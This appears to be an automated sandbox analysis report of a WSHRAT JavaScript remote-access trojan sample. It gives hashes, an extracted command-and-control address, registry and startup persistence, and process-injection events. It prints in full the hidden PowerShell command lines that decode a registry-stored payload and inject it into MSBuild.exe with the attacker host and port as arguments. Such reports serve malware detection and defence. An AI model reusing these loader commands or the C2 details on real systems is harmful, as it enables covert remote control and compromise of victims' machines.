Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
14-05-2024 15:28
Static task
static1
Behavioral task
behavioral1
Sample
cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
Resource
win10v2004-20240508-en
General
-
Target
cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
-
Size
616KB
-
MD5
70a617fd2bdb08c64a65ecfba1612140
-
SHA1
d41eec4cb2f449b845d3f4fa3baf80086705bba6
-
SHA256
cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc
-
SHA512
52c22c0b1d8b8e1b69224e4164fb75d0b07b7b1f8fb6b9b843218f0c01cae0279fe45cecbb538b021ddb7e57c723917ae2f34186881db210c8b4953b7a2b0961
-
SSDEEP
12288:NYeIrWr/qRigAyX/kngXFbjTLvaH28nZH19Iimg0VtxWvTbxzOObcizI/mofdEMa:NYeIrWr/qRigAyX/kngXFbjTLvaH28nZ
Malware Config
Extracted
wshrat
http://masterokrwh.duckdns.org:8426
Signatures
-
Blocklisted process makes network request 35 IoCs
flow pid Process 2 1240 wscript.exe 4 1240 wscript.exe 7 1240 wscript.exe 9 1240 wscript.exe 10 1240 wscript.exe 22 1240 wscript.exe 24 1240 wscript.exe 28 1240 wscript.exe 29 1240 wscript.exe 30 1240 wscript.exe 31 1240 wscript.exe 34 1240 wscript.exe 46 1240 wscript.exe 47 1240 wscript.exe 48 1240 wscript.exe 49 1240 wscript.exe 50 1240 wscript.exe 51 1240 wscript.exe 55 1240 wscript.exe 56 1240 wscript.exe 57 1240 wscript.exe 58 1240 wscript.exe 59 1240 wscript.exe 60 1240 wscript.exe 67 1240 wscript.exe 68 1240 wscript.exe 69 1240 wscript.exe 70 1240 wscript.exe 71 1240 wscript.exe 72 1240 wscript.exe 73 1240 wscript.exe 74 1240 wscript.exe 75 1240 wscript.exe 76 1240 wscript.exe 77 1240 wscript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1556 powershell.exe 4560 powershell.exe 4612 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js wscript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js\"" wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js\"" wscript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 pastebin.com 10 pastebin.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4612 set thread context of 1608 4612 powershell.exe 92 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 31 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 55 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 56 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 31 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 49 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 72 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 47 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 58 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 59 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 46 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 48 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 57 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 73 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 74 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 24 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 71 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 34 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 69 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 76 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 77 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 68 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 28 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 29 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 30 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 67 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 75 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 50 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 51 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 60 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom HTTP User-Agent header 70 WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1556 powershell.exe 1556 powershell.exe 4560 powershell.exe 4560 powershell.exe 4612 powershell.exe 4612 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1556 powershell.exe Token: SeDebugPrivilege 4560 powershell.exe Token: SeDebugPrivilege 4612 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1608 MSBuild.exe 1608 MSBuild.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1240 wrote to memory of 1556 1240 wscript.exe 86 PID 1240 wrote to memory of 1556 1240 wscript.exe 86 PID 1240 wrote to memory of 4560 1240 wscript.exe 88 PID 1240 wrote to memory of 4560 1240 wscript.exe 88 PID 1240 wrote to memory of 4612 1240 wscript.exe 90 PID 1240 wrote to memory of 4612 1240 wscript.exe 90 PID 4612 wrote to memory of 1608 4612 powershell.exe 92 PID 4612 wrote to memory of 1608 4612 powershell.exe 92 PID 4612 wrote to memory of 1608 4612 powershell.exe 92 PID 4612 wrote to memory of 1608 4612 powershell.exe 92 PID 4612 wrote to memory of 1608 4612 powershell.exe 92 PID 4612 wrote to memory of 1608 4612 powershell.exe 92 PID 4612 wrote to memory of 1608 4612 powershell.exe 92 PID 4612 wrote to memory of 1608 4612 powershell.exe 92 PID 4612 wrote to memory of 1608 4612 powershell.exe 92
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'masterokrwh.duckdns.org 8426 \"WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom\" 1'));"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exepath masterokrwh.duckdns.org 8426 "WSHRAT|1426F231|BVRKIPTS|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 14/5/2024|JavaScript-v3.4|GB:United Kingdom" 13⤵
- Suspicious use of SetWindowsHookEx
PID:1608
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
Filesize
1KB
MD532535a8d767830ad16830ddca0d7e844
SHA191faee64f812c45f4f7e1dcab1b3fc8314446c6a
SHA256659f5725da2bae4a7d94dfa90af83b0e4054465ae8937e570473c1528866f03b
SHA5120716d3b0d92627de5c427ba1b0a7ced71a57c49077e27c65d3a8d65a4014145f586ecdade44df908aacfc38d445092f61864ff51a0b4ac0fe35d1bd5cb576e7b
-
Filesize
1KB
MD5cda00af30c2c12744b01d300660749a1
SHA1d679fcd78cd8d5c797d02be7752144613ea898db
SHA25695a5b881385d6ed6b030711628d5db3c3bfe8e8093aab499337e7bc6c73de6c1
SHA5127af9027ed1eec2df46967bac66decc3dadeddd5e3696546f44ee872053e47d1ea97fc8f541d15459891813e9075f762074691976b2c8f3a0c1d8487edb73116f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc.js
Filesize616KB
MD570a617fd2bdb08c64a65ecfba1612140
SHA1d41eec4cb2f449b845d3f4fa3baf80086705bba6
SHA256cc10da7e2a5c074cc559ed0f19a4880ae171a44b0039a5d3caadfd326db714fc
SHA51252c22c0b1d8b8e1b69224e4164fb75d0b07b7b1f8fb6b9b843218f0c01cae0279fe45cecbb538b021ddb7e57c723917ae2f34186881db210c8b4953b7a2b0961